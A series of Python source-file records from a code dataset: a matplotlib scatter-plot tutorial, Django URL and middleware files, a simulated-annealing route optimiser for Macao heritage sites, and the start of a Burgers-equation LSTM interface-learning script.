plt\n\ninput_squares = list(range(1001))\nsquares = [x**2 for x in input_squares]\n\n''' 显示点,需要传入一对x,y坐标值 '''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c='red') \n# s参数代表点的大小,edgecolors='none'代表弄掉点的轮廓,c代表点的颜色\n# 设置颜色映射,用法: 将数据集传给c,然后增加cmap参数,设置整个数据集怎么变\n# plt.cm.Blues 代表值小的点颜色浅,值大的点颜色深\n\n''' 要了解pyplot中所有的颜色映射,访问:http://matplotlib.org/,单机Examples,向下滚动到\n Color Examples,再点击colormaps_reference \n'''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c=squares,cmap=plt.cm.Blues)\n''' 设置图参数 '''\nplt.title(\"Square Numbers\",fontsize=24) # 设置图像的标题\nplt.xlabel(\"Value\",fontsize=14) # 设置x轴的标签 \nplt.ylabel(\"Square of Value\",fontsize=14) # 设置y轴的标签\n\n''' 设置刻度标记的大小 '''\nplt.tick_params(axis='both',which='major',labelsize=14)\n''' 显示散点图 '''\nplt.show()\n\n''' 保存图表 '''\n#plt.savefig('1.png',bbox_inches='tight')\n''' 第一个参数是以什么名字保存,第二个参数是省去空白部分 '''", "sub_path": "matplotlib/example1/c2.py", "file_name": "c2.py", "file_ext": "py", "file_size_in_byte": 1234, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.pyplot.scatter", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}]} {"seq_id": "201307456", "text": "from django.conf import settings\nfrom django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\n\nfrom yaapi import views as yaapi_view\nfrom yacommon import views as yacommon_view\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n url(r'account/api-auth', include('rest_framework.urls', namespace='rest_framework')),\n url(r'account/api-token-auth', obtain_jwt_token),\n url(r'account/api-token-refresh', refresh_jwt_token),\n url(r'account/api-token-verify', verify_jwt_token),\n url(r'system/info', yacommon_view.SystemInfo.as_view(), name='system_info'),\n url(r'blog/resume', yacommon_view.ResumeInfo.as_view(), name='resume_info'),\n url(r\"^\", include(router.urls)),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'all', yaapi_view.APIRootView.as_view(), name='all_api'),\n ]\n", "sub_path": "yadjangoweb/yaapi/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.obtain_jwt_token", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.refresh_jwt_token", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.verify_jwt_token", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "yacommon.views.SystemInfo.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "yacommon.views.SystemInfo", "line_number": 16, "usage_type": "attribute"}, {"api_name": "yacommon.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "yacommon.views.ResumeInfo.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "yacommon.views.ResumeInfo", "line_number": 17, "usage_type": "attribute"}, {"api_name": "yacommon.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "yaapi.views.APIRootView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "yaapi.views.APIRootView", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yaapi.views", "line_number": 25, "usage_type": "name"}]} {"seq_id": "494041862", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on \n@author: weishan_lee\n\nSight-seeing order of Macao World Heritage Sites\nCase 2: Travel distance or time for pairs of cities recorded in the following csv files: \n (1) carTime.csv records time required for driving a car.\n (2) busTime.csv records time required for taking a bus.\n (3) pedestrianTime.csv records time required by walking between a pair of cities.\n (4) carDistance.csv records distance between a pair of sites by car.\n (5) pedestrianDistance.csv records distance between a pair of sites by foot.\n The optimal route is found based on the Simulated Annealing and Metropolis Algorithm. \nVersion 3_2: 1. Write to log.txt automatically.\n 2. Add funcion definition plotRoute\n 3. Modify function distance\n\"\"\"\nfrom math import exp\nimport numpy as np\nimport random as rand\nfrom vpython import * \nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler()\nimport sys\nimport os.path\n\n## Function Definitions\n\n# Function to calculate the updated total distance or time of the tour\ndef distanceUpdate(i, j, oldScore, randomList, rCoor):\n s = oldScore\n lList = len(randomList)\n\n if abs(i-j)==1:\n if ij\n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n jN = randomList[j+1]\n \n iF = randomList[i-1]\n iC = randomList[i]\n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1] \n \n if jC!=iF or jN!=iC: print(\"WRONG! jC!=iF or jN!=iC! LINE 78\")\n s = s - rCoor[jF,jC] - rCoor[jC,jN] - rCoor[iC,iN]\n s = s + rCoor[jF,iC] + rCoor[iC,jC] + rCoor[jC,iN]\n else:\n \n if i == 0: \n iF = randomList[-1]\n else:\n iF = randomList[i-1]\n \n iC = randomList[i]\n \n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1]\n \n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n if j == lList-1: \n jN = randomList[0]\n else:\n jN = randomList[j+1]\n \n s = s - rCoor[iF,iC] - rCoor[iC,iN] - rCoor[jF,jC] - rCoor[jC,jN]\n s = s + rCoor[iF,jC] + rCoor[jC,iN] + rCoor[jF,iC] + rCoor[iC,jN] \n return s\n\n# Function to calculate the initial total distance or time of the tour\ndef distance(randomList, rCoor):\n s = 0.0\n for i in range(N):\n j = randomList[i-1]\n k = randomList[i]\n s += rCoor[j,k]\n return s\n\n# output of the score (distance vs time steps)\ndef outPutScrVSTime(tRecord, scoreRecord):\n data = {'timeStep': tRecord,'score':scoreRecord}\n dfCSV = pd.DataFrame(data)\n dfCSV_file = open('./scoreVSTime.csv','w',newline='') \n dfCSV.to_csv(dfCSV_file, sep=',', encoding='utf-8',index=False)\n dfCSV_file.close()\n \ndef outPutSitesOrder(randomList):\n ## Write randomList back to cities datafram\n \n sites[\"sitesOrder\"] = randomList\n \n sitesOrder = pd.DataFrame(columns = ['sitesId', 'Name'])\n sitesOrder_file = open(\"./sightSeeingOrder.csv\",'w',newline='') \n\n for i in range(N+1):\n if i == N:\n integer = np.uint32(sites.loc[0].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n else:\n integer = np.uint32(sites.loc[i].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n\n sitesOrder.to_csv(sitesOrder_file, sep=',', encoding='utf-8', index=False) \n sitesOrder_file.close()\n\ndef plotRoute(rr, sites):\n x = []\n y = []\n n = [int(num) for num in rCoor[:,3].tolist()]\n\n for i in range(N+1):\n if i == N:\n x.append( sites.loc[n[0]].X )\n y.append( sites.loc[n[0]].Y )\n else:\n x.append( sites.loc[n[i]].X )\n y.append( sites.loc[n[i]].Y )\n fig, ax = plt.subplots()\n ax.title.set_text(\"Optimal Tour Path\")\n\n ax.plot(x,y,'k-')\n ax.scatter(x[0],y[0],c='blue')\n ax.scatter(x[1:-1],y[1:-1],c='red')\n\n for i, txt in enumerate(n):\n ax.annotate(txt, (x[i], y[i]))\n\n ax.set_xlabel(\"Longitude\",size = 12)\n ax.set_ylabel(\"Latitude\",size = 12)\n ax.ticklabel_format(useOffset=False)\n plt.grid(True)\n plt.savefig(\"optimalTourPath.eps\") \n \ndef writeLog(msg):\n with open('log.txt', 'a+') as the_file:\n print(msg)\n the_file.write(msg)\n\nimport os, psutil\n# If previous log.txt file exists, remove it.\nif os.path.exists(\"./log.txt\"):\n os.remove(\"./log.txt\")\n \ndef cpu_stats():\n pid = os.getpid()\n py = psutil.Process(pid)\n memory_use = py.memory_info()[0] / 2. ** 30\n return 'Memory: ' + str(np.round(memory_use, 2)) + 'GB\\t'\n\n########################## Parameters and Options ############################\n## If you need animation?\nanimation = False\n## If you need to record score vs time step?\nscoreVsTime = False\n\n## Set up Case and load matrix of time or distance for each pair of cities.\n# case = 1: car Time. \n# case = 2: bus time. Some pair of route may be replaced by pedestrian time.\n# case = 3: pedestrin time.\n# case = 4: car distance.\n# cas3 = 5: pedestrian distance.\ncase = 4\n\n## Parameters for Simulated annealing\nTmax = 1.0\nTmin = 1e-2\ntau = 1e3\ntargetScore = 13.916 # carTime 78. busTime = 117. pedestrianTime = 115.\n # carDistance 13.916. pedestrianDistance = 7.844\n###############################################################################\n\n# Load world heritage sites locations\nsites = pd.read_csv(\"./macauWHSLoc.csv\")\nR = 0.02\nN = sites.shape[0]\n\n## normalize data\n\nsites['normX'] = min_max_scaler.fit_transform(sites.X.values.reshape(-1, 1))\nsites['normY'] = min_max_scaler.fit_transform(sites.Y.values.reshape(-1, 1))\n\nif case == 1:\n matrix_ = pd.read_csv(\"./carTime.csv\")\nelif case == 2:\n matrix_ = pd.read_csv(\"./busTime.csv\")\nelif case == 3:\n matrix_ = pd.read_csv(\"./pedestrianTime.csv\")\nelif case == 4:\n matrix_ = pd.read_csv(\"./carDistance.csv\")\nelse:\n matrix_ = pd.read_csv(\"./pedestrianDistance.csv\")\n\nN = 25 # number of sites\n\n# Set up the initial configuration\nrandomList = rand.sample(range(0, N), N)\n\n## Change sites dataframe to rCoor array \n# rCoor could mean the time or distance of a pair of cities.\n\nrCoor = np.empty([N,N])\nfor i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] # matrix value\n\n## Change sites dataframe to rPlot array\nrPlot = np.empty([N+1,4])\nfor i in range(N):\n j = randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n# Add one more ending site which is identical the starting site\nrPlot[N,0] = rPlot[0,0]\nrPlot[N,1] = rPlot[0,1]\nrPlot[N,2] = rPlot[0,2]\nrPlot[N,3] = rPlot[0,3]\n\n#Calculate the initial distance\n\nscore = distance(randomList, rCoor)\ninitScore = score\nminScore = initScore\nmsg = \"Initial score = {:.5f}\\n\".format(initScore)\n\noldScore = score\n\n# Write the log.txt file for the first time.\nwriteLog(msg)\n\n# Set up the graphics\nif animation == True:\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n## Simulated annealing\n## Main loop\n\ntRecord = []\nscoreRecord = []\n\nt0=0 # setting up the beginning of the time \"lump\"\ntRecord += [0]\nscoreRecord += [score]\n\nfirstInitial = True\n\nwhile (score>targetScore):\n \n if firstInitial == False: \n # Set up another initial configuration\n randomList = rand.sample(range(0, N), N)\n\n ## Change sites dataframe to rCoor array\n rCoor = np.empty([N,N])\n for i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] \n \n #Calculate the initial distance\n score = distance(randomList, rCoor)\n\n ## Change sites dataframe to rPlot array\n rPlot = np.empty([N+1,4])\n for i in range(N):\n j = randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n # Add one more ending site which is identical the starting site\n rPlot[N,0] = rPlot[0,0]\n rPlot[N,1] = rPlot[0,1]\n rPlot[N,2] = rPlot[0,2]\n rPlot[N,3] = rPlot[0,3]\n \n if animation == True:\n # Set up the graphics\n scene.delete()\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n T = Tmax\n t = 0\n while (T>Tmin):\n # Cooling\n t += 1\n T = Tmax*exp(-t/tau)\n\n # Choose two sites to swap and make sure they are distinct\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n while i==j:\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n \n # Swap them and calculate the change in score\n oldScore = score\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n \n score = distanceUpdate(i,j,oldScore,randomList,rCoor)\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n scoreCheck = distance(randomList, rCoor)\n if abs(score-scoreCheck)>1e-4:\n randomList[i], randomList[j] = randomList[j], randomList[i]\n msg = \"Score Error! Line 359.\\n\" +\\\n \"i = {}, j = {}, randomList[i] = {}, randomList[j] = {}\\n\".format(i,j,randomList[i],randomList[j]) +\\\n \"score = {}, scoreCheck = {}\".format(score,scoreCheck)\n writeLog(msg)\n sys.exit()\n \n deltaScore = score - oldScore\n\n try:\n ans = np.exp(-deltaScore/T)\n except OverflowError:\n if -deltaScore/T > 0:\n ans = float('inf')\n else:\n ans = 0.0\n \n # If the move is rejected, swap them back again\n if rand.random() > ans:\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n score = oldScore\n if np.abs(score - distance(randomList, rCoor))>1e-5:\n msg = \"score: {}\".format(score)\n writeLog(msg)\n msg = \"distance: {}\".format(distance(randomList, rCoor))\n writeLog(msg)\n msg = \"Error Line 390\"\n writeLog(msg)\n sys.exit()\n \n if animation == True: \n # Update the visualization every 100 moves\n if t%100==0:\n rate(25)\n for i in range(N+1):\n pos = vector(rPlot[i,0],rPlot[i,1],0.0)\n l.modify(i,pos)\n \n if scoreVsTime == True:\n #if t%1==0:\n tRecord += [t0+t]\n scoreRecord += [score]\n \n #writeLog(cpu_stats())\n \n if score < minScore: \n minScore = score\n outPutScrVSTime(tRecord, scoreRecord)\n outPutSitesOrder(randomList)\n dt = datetime.now()\n msg = str(dt.year) + '/' + str(dt.month) + '/' + str(dt.day) + ' ' +\\\n str(dt.hour) + ':' + str(dt.minute) + ':' + str(dt.second) +'\\t'\n writeLog(msg)\n msg = \"Delta score = {:.5f}\\t\".format(deltaScore)\n writeLog(msg)\n msg = \"New score = {:.5f}\\n\".format(score)\n writeLog(msg) \n \n t0 = t0 + t # go to next time \"lump\"\n firstInitial = False\n# End of Main Loop\nif case == 1 or case == 2 or case == 3:\n msg = \"The initial total traveling time = {:.5f} min\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling time = {:.5f} min\\n\".format(score)\n writeLog(msg)\nelse:\n msg = \"The initial total traveling distance = {:.5f} km\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling distance = {:.5f} km\\n\".format(score)\n writeLog(msg)\n\n# plot score vs t\nplt.figure()\nplt.title(\"traveling time vs Iteration\")\nax = plt.gca()\nenVsTime = pd.read_csv( \"./scoreVSTime.csv\") \nplt.plot(enVsTime.timeStep,enVsTime.score,'k-')\nplt.minorticks_on()\nminorLocatorX = AutoMinorLocator(5) # number of minor intervals per major # inteval\nminorLocatorY = AutoMinorLocator(5)\nax.set_xlabel(\"Iteration\",size = 16)\nif case == 1 or case == 2 or case == 3:\n ax.set_ylabel(\"Total traveling time (min)\",size = 16)\nelse:\n ax.set_ylabel(\"Total traveling distance (km)\",size = 16)\nax.xaxis.set_minor_locator(minorLocatorX) # add minor ticks on x axis\nax.yaxis.set_minor_locator(minorLocatorY) # add minor ticks on y axis\nplt.grid(True)\n#plt.xlim(-20000,500000)\nplt.savefig(\"scoreVsTime.eps\")\nplt.show() \n\nscoreCheck = distance(randomList, rCoor)\nif case == 1 or case == 2 or case == 3:\n msg = \"The checked optimal total traveling time = {:.5f} min\".format(scoreCheck)\n writeLog(msg)\nelse:\n msg = \"The checked optimal total traveling distance = {:.5f} km\".format(scoreCheck)\n writeLog(msg)", "sub_path": "SAMAV3_2.py", "file_name": "SAMAV3_2.py", "file_ext": "py", "file_size_in_byte": 14926, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 27, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.uint32", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.uint32", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 179, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 182, "usage_type": "call"}, {"api_name": "psutil.Process", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 210, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 220, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 222, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 228, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 244, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 308, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 338, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 341, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 343, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 368, "usage_type": "call"}, {"api_name": "random.random", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 385, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 392, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 413, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 413, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 437, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 437, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 438, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 438, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 439, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 439, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 441, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 441, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.minorticks_on", "line_number": 442, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 442, "usage_type": "name"}, {"api_name": "matplotlib.ticker.AutoMinorLocator", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.ticker.AutoMinorLocator", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 455, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 455, "usage_type": "name"}]} {"seq_id": "180715711", "text": "from django.conf import settings\n\nfrom account.models import AdminProfile, EmployerProfile, StudentProfile\n\n__all__ = (\n 'UserProfileMiddleware'\n)\n\n\nclass UserProfileMiddleware(object):\n\n def process_request(self, request):\n \"\"\"Add related profile of user to request object\"\"\"\n if request.user.is_authenticated():\n role_type = request.session.get('role_type', None)\n\n if role_type == settings.ROLE_TYPES.get('admin'):\n request.user_profile = AdminProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('employer'):\n request.user_profile = EmployerProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('student'):\n request.user_profile = StudentProfile.objects.get(user_id=request.user.id)\n\n request.session['role_type'] = role_type\n\n return", "sub_path": "account/middlewares.py", "file_name": "middlewares.py", "file_ext": "py", "file_size_in_byte": 936, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.conf.settings.ROLE_TYPES.get", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.settings.ROLE_TYPES", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "account.models.AdminProfile.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "account.models.AdminProfile.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "account.models.AdminProfile", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.ROLE_TYPES.get", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.ROLE_TYPES", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "account.models.EmployerProfile.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "account.models.EmployerProfile.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "account.models.EmployerProfile", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.settings.ROLE_TYPES.get", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.settings.ROLE_TYPES", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "account.models.StudentProfile.objects.get", "line_number": 24, "usage_type": "call"}, {"api_name": "account.models.StudentProfile.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "account.models.StudentProfile", "line_number": 24, "usage_type": "name"}]} {"seq_id": "308366200", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nLearning from past (LP) interface learning for 1D Burgers problem with an \ninitial condition of square wave. \nLeft zone is truncated and compensated for by an LSTM model.\n\nThis correpsonds to Example 1 for the following paper:\n \"Interface learning of multiphysics and multiscale systems\",\n Physical Review E, 2020\n \nFor questions, comments, or suggestions, please contact Shady Ahmed,\nPhD candidate, School of Mechanical and Aerospace Engineering, \nOklahoma State University. @ shady.ahmed@okstate.edu\nlast checked: 11/10/2020\n\"\"\"\n\n#%% Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as LA\nfrom scipy.linalg import block_diag\n\nfrom numpy.random import seed\nseed(0)\n\nimport tensorflow as tf\ntf.random.set_seed(0)\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.models import load_model\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport joblib\n\nimport os\nimport sys\n#%% Define Functions\n\n#-----------------------------------------------------------------------------!\n#compute rhs for numerical solutions\n# r = -u*u' + nu*u''\n#-----------------------------------------------------------------------------!\ndef rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u):\n r = np.zeros(nx-nxb+1)\n r[1:nx-nxb] =(nu2/(dx*dx))*(u[2:nx-nxb+1] -2.0*u[1:nx-nxb] +u[0:nx-nxb-1])\\\n - g2*u[1:nx-nxb] \\\n -(1.0/3.0)*(u[2:nx-nxb+1]+u[0:nx-nxb-1]+u[1:nx-nxb])\\\n *(u[2:nx-nxb+1]-u[0:nx-nxb-1])/(2.0*dx)\n return r\n\n#-----------------------------------------------------------------------------#\n# Neural network Routines\n#-----------------------------------------------------------------------------#\ndef create_training_data_lstm(features,labels, m, n, lookback):\n # m : number of snapshots \n # n: number of states\n ytrain = [labels[i,:] for i in range(lookback,m)]\n ytrain = np.array(ytrain) \n \n xtrain = np.zeros((m-lookback,lookback,n))\n for i in range(m-lookback):\n a = np.copy(features[i,:])\n for j in range(1,lookback):\n a = np.vstack((a,features[i+j,:]))\n xtrain[i,:,:] = a\n return xtrain , ytrain\n\n\n#%% Main program:\n \n# Inputs\nnx = 4*1024 #spatial resolution\nlx = 1.0 #spatial domain\ndx = lx/nx\nx = np.linspace(0, lx, nx+1)\n\nnu1 = 1e-2 #control dissipation\nnu2 = 1e-4 #control dissipation\ng1 = 0 #friction\ng2 = 1 #friction\n\ntm = 1 #maximum time\ndt = 2.5e-4 #solver timestep\nnt = round(tm/dt)\nt = np.linspace(0, tm, nt+1)\n\nns = 4000 #number of snapshots to save\nfreq = round(nt/ns)\n\n\ntraining = 'true'\n#%% Read data\nnpt = 3 #number of points in input\n\nuFOM = np.zeros((7,ns+1,nx+1))\nxi = np.zeros((7,ns+1,2*npt+1))\nyi = np.zeros((7,ns+1,1))\n\nfor ii in range(7):\n nxb= int((ii+1)*nx/8)\n data = np.load('./Data/uFOM_xb='+str(nxb/nx)+'_.npy')\n uFOM[ii,:,:] = data.T\n for jj in range(npt):\n xi[ii,:,jj] = data[nxb+jj,:].T\n xi[ii,:,npt+jj] = x[nxb+jj]\n \n xi[ii,:,-1] = t\n yi[ii,:,0] = data[nxb,:]\n\n#%% Divide into training and testing\n#uTrain = uFOM[[0,2,4,6],:,:]\n#uTest = uFOM[[1,3,5],:,:] \n\nxTrain = xi[[0,2,4,6],:,:]\nyTrain = yi[[0,2,4,6],:,:]\n\nlookback = 1\n#%%\nif training == 'true': \n \n for i in range(4):\n features = xTrain[i,:,:] \n labels = yTrain[i,:,:]\n xt, yt = create_training_data_lstm(features, labels, features.shape[0], \\\n features.shape[1], lookback)\n if i == 0:\n xtrain = xt\n ytrain = yt\n else:\n xtrain = np.vstack((xtrain,xt))\n ytrain = np.vstack((ytrain,yt))\n \n #%% \n # Scaling data\n m,n = ytrain.shape # m is number of training samples, n is number of output features\n scalerOut = 